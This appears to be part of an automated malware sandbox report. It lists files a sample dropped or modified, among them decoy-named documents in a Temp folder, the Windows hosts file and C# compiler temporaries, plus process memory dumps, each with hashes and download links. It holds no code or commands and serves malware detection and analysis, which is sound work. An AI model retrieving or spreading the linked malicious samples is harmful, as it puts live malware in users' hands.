23f9df121f9b5405c3c2806acf07e81fa175ada14e7fa73982166dd6b36c0d57d225a0b61a633017b1ef92b1df09ca6f0c854e5c98cd56769662d1a58763696f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RestartLock.xls

Filesize
511KB

MD5
6e2945efca70d9bb9116473494b167b4

SHA1
0c7455269d319a429289add92d691a0a58a0d30f

SHA256
f38e70a4b08d931c2acda21ed02466ac8790614143cd535958993dac3f9d9b0f

SHA512
2fd64a146e1f2ca4cf9eb96517a17ddc5f790f7fa45f7964c9214188dfdc14a8a1c40174784cd319c0e93e4de0776b5a985471110a5cf6385d7b715a2f740954

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RestoreCheckpoint.doc

Filesize
325KB

MD5
c32f798431a3cec7d8789adc81fadd06

SHA1
a11b5bc8026c81328af0977e1381c3cc0fe70bb6

SHA256
c1bbca141e79e29a0353ea220a0c6b669aca32848cdb4e2608af2acd376e0147

SHA512
b2477bcb882941fb0ca72275a54e4ea0df396681bd9fac266ab1f2540521e365de158f47604d4a1b74523921933f2d364ea24368a339560146f8324a862e5784

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SkipExport.docx

Filesize
442KB

MD5
f5b7905f48c6cb5e747fa2b51bfedb57

SHA1
6415159f7bd6ed3c6ac7bd46a95c0f6686173f74

SHA256
d62965fe53446b8bcc09bdf03e5f2ef4bb1626df2c2828ec14b0662c9f8670fb

SHA512
0f19ead66af8ea8f477b84a7226ddcce8a32c0d97da0855ace9457e3b819d25e099d12b4f65d41eba93e0a366403fa265a487a3d1bb2c316720d2fb179062654

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UnlockExit.xls

Filesize
488KB

MD5
85bed475cd568f74c9ebb365bfb30c20

SHA1
c4f5d2744e3915d03a5a4667410f5a4793ac0b86

SHA256
a5f4a9ea05204fd2f4dbfa89d887a7b26c2616168e1c51a91462e4a3febbe6a0

SHA512
3df2f4edffa420a880a655936645a8cbb2045a1a0c753e6e3f20b8ff684fc98e80ab72e5c772bfe97c299386c0650859c43b0a939fccdfbfbe617ec0541829e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupWrite.001

Filesize
1.1MB

MD5
c033e2dafe36116659129555c9df9ffd

SHA1
56ba7335833478eb9f64003aa8d3634ee57babd1

SHA256
1ef5cd3e2fecb9547ee9af4833d0a46b9409bec82cde132d3b8da47f8a8cb275

SHA512
d08faaaf761ee9476efbf9c9934212e987d5df6506528db79774be1a3a2108dd7c6fc6562bccf677caf68f5a366667b79398292e1e542e8b9b0c1e0942c07c9c

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsbpjfok\CSC41E2D6C4D0494B478EF74D442E5AC39.TMP

Filesize
652B

MD5
a580fb8b3b43f27deb8ebeca4e208503

SHA1
6f7b80d74e09e90664be379d2188644d2a59e412

SHA256
3ce37497a2ec0fe2db3c43fa2974ed5972c1fc1f7a8bef2454801c17fc108bee

SHA512
952a8ee76909ee3c3e9d0fa397d4b343bdb77fc11be55d429f5e3cead583e4b0cc784e0334442ad4dceac1df9922b15e73f4e11902a2c76991b86c4bbcc01adf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsbpjfok\tsbpjfok.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsbpjfok\tsbpjfok.cmdline

Filesize
607B

MD5
08b1e5f3e4e250702bd30d00231b9544

SHA1
20ed7df7939feab23dd74d936da8f11b99581bd3

SHA256
5414183deaa4a5e3de170de386878b9a24e765db45bc84aa1188833e06e2d886

SHA512
80fcfb1febc0f230924cd6612e875da6532f02d7a27468efb34424439924b0127971b9e208263a8560bab9de8d302404e4d4f9032a6fcdadedfc4263f8ae2913

Download Submit
memory/336-221-0x00000267E4970000-0x00000267E4978000-memory.dmp

Filesize
32KB

Download
memory/556-66-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp

Filesize
208KB

Download
memory/556-865-0x00007FFD85000000-0x00007FFD85014000-memory.dmp

Filesize
80KB

Download
memory/556-224-0x0000026B36E70000-0x0000026B373A3000-memory.dmp

Filesize
5.2MB

Download
memory/556-223-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp

Filesize
824KB

Download
memory/556-179-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp

Filesize
208KB

Download
memory/556-25-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp

Filesize
6.4MB

Download
memory/556-107-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp

Filesize
100KB

Download
memory/556-322-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp

Filesize
208KB

Download
memory/556-319-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp

Filesize
1.5MB

Download
memory/556-313-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp

Filesize
6.4MB

Download
memory/556-328-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp

Filesize
716KB

Download
memory/556-95-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp

Filesize
1.5MB

Download
memory/556-48-0x00007FFD8F810000-0x00007FFD8F81F000-memory.dmp

Filesize
60KB

Download
memory/556-47-0x00007FFD86460000-0x00007FFD86487000-memory.dmp

Filesize
156KB

Download
memory/556-54-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp

Filesize
172KB

Download
memory/556-56-0x00007FFD8D3D0000-0x00007FFD8D3E9000-memory.dmp

Filesize
100KB

Download
memory/556-751-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp

Filesize
6.4MB

Download
memory/556-81-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp

Filesize
148KB

Download
memory/556-75-0x00007FFD85000000-0x00007FFD85014000-memory.dmp

Filesize
80KB

Download
memory/556-77-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp

Filesize
172KB

Download
memory/556-80-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp

Filesize
716KB

Download
memory/556-78-0x00007FFD863C0000-0x00007FFD863CD000-memory.dmp

Filesize
52KB

Download
memory/556-73-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp

Filesize
5.2MB

Download
memory/556-72-0x0000026B36E70000-0x0000026B373A3000-memory.dmp

Filesize
5.2MB

Download
memory/556-70-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp

Filesize
6.4MB

Download
memory/556-876-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp

Filesize
208KB

Download
memory/556-864-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp

Filesize
5.2MB

Download
memory/556-875-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp

Filesize
100KB

Download
memory/556-874-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp

Filesize
1.5MB

Download
memory/556-873-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp

Filesize
148KB

Download
memory/556-872-0x00007FFD8D3D0000-0x00007FFD8D3E9000-memory.dmp

Filesize
100KB

Download
memory/556-871-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp

Filesize
172KB

Download
memory/556-870-0x00007FFD8F810000-0x00007FFD8F81F000-memory.dmp

Filesize
60KB

Download
memory/556-869-0x00007FFD86460000-0x00007FFD86487000-memory.dmp

Filesize
156KB

Download
memory/556-868-0x00007FFD86EF0000-0x00007FFD86EFD000-memory.dmp

Filesize
52KB

Download
memory/556-867-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp

Filesize
716KB

Download
memory/556-866-0x00007FFD863C0000-0x00007FFD863CD000-memory.dmp

Filesize
52KB

Download
memory/556-225-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp

Filesize
5.2MB

Download
memory/556-863-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp

Filesize
824KB

Download
memory/556-853-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp

Filesize
6.4MB

Download
memory/556-877-0x0000026B36E70000-0x0000026B373A3000-memory.dmp

Filesize
5.2MB

Download
memory/556-71-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp

Filesize
824KB

Download
memory/556-64-0x00007FFD86EF0000-0x00007FFD86EFD000-memory.dmp

Filesize
52KB

Download
memory/556-62-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp

Filesize
100KB

Download
memory/556-60-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp

Filesize
1.5MB

Download
memory/556-58-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp

Filesize
148KB

Download
memory/4316-82-0x00007FFD752D3000-0x00007FFD752D5000-memory.dmp

Filesize
8KB

Download
memory/4316-92-0x0000016F32860000-0x0000016F32882000-memory.dmp

Filesize
136KB

Download
memory/4316-93-0x00007FFD752D0000-0x00007FFD75D92000-memory.dmp

Filesize
10.8MB

Download
memory/4316-94-0x00007FFD752D0000-0x00007FFD75D92000-memory.dmp

Filesize
10.8MB

Download
memory/4316-111-0x00007FFD752D0000-0x00007FFD75D92000-memory.dmp

Filesize
10.8MB

Download